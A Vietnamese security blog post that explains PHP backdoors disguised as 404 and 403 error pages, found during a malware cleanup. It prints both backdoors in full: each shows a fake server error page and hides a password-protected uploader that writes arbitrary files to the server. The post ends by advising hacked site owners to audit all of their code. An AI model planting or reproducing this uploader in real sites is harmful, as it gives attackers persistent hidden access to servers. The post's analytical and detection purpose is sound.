Shell Ẩn Trong File 404 và 403

Hai lỗi 404 và 403 chắc rất quen với các bạn làm website để báo rằng file, link không tồn tại hoặc không có quyền tuy nhiên ngần đây mình có hỗ trợ một bạn xử lý mã độc và thấy rằng có mã độc ẩn trong chính file thông báo lỗi 404 và 403. loại backdoor này chỉ có nhiệm vụ upload file nên việc scan nó trên các công cụ quét mã độc là điều không thể.

Mình chia sẻ lại code của 2 file này để mọi người cùng nhau thảo luận và nghiên cứu

Backdoor giả trang lỗi 404

<?php
echo "<html><head><title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL ".$_SERVER['REQUEST_URI']." was not found on this server.</p>
<hr>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>";if(isset($_POST['uploaded'])){$file=$_FILES['files']['name'];$files=$_FILES['files']['tmp_name'];$folder="";if(move_uploaded_file($files,$folder.$file)){$result="Uploaded : => <A href='$file' target='_blank'>Your file here</A>";}else {$result="Failed to upload...!";}}$password="mnhblog";if($_GET['pass']==$password){echo '<br /><br /><br /><html><head><title>P1X Uploader</title></head><body><center><form action="" method="post" enctype="multipart/form-data">
<input type="file" name="files" />
<input type="submit" name="uploaded" value="Upload">
</form>'.$result.'</center></body></html>';}?>

Backdoor giả trang lỗi 403

<?php
echo "<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access ".$_SERVER['REQUEST_URI']."  on this server.</p>
<p>Additionally, a 403 Forbidden
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>";if(isset($_POST['uploaded'])){$file=$_FILES['files']['name'];$files=$_FILES['files']['tmp_name'];$folder="";if(move_uploaded_file($files,$folder.$file)){$result="Uploaded : => <A href='$file' target='_blank'>Your file here</A>";}else {$result="Failed to upload...!";}}$password="vouuvhb";if($_GET['pass']==$password){echo '<br /><br /><br /><html><head><title>P1X Uploader</title></head><body><center><form action="" method="post" enctype="multipart/form-data">
<input type="file" name="files" />
<input type="submit" name="uploaded" value="Upload">
</form>'.$result.'</center></body></html>';}?>

Đối với các backdoor kiểu này khá khó phát hiện ra nên khuyên bạn nào đã bị hack thì nên đọc lại toàn bộ code của mình kể cả file thông báo lỗi vì không có nơi nào an toàn khi đã bị hack cả!

Tags # Hack

About Manh Tuong
Mạnh Tường là một người làm trong lĩnh vực an toàn thông tin tại việt nam đam mê chia sẻ nếu có nhắn nhủ hãy mail cho anh ấy qua: contact@manhtuong.net.

Home Top Ad

Post Top Ad

Thứ Sáu, 6 tháng 7, 2018

Shell Ẩn Trong File 404 và 403

Không có nhận xét nào:

Đăng nhận xét

Post Top Ad

Popular Posts

Categories

Latest News

Social

Recent

Popular

Comments

Archive

Sponsor

Photography

Tags

About Us

Hacking

Tags

Biểu mẫu liên hệ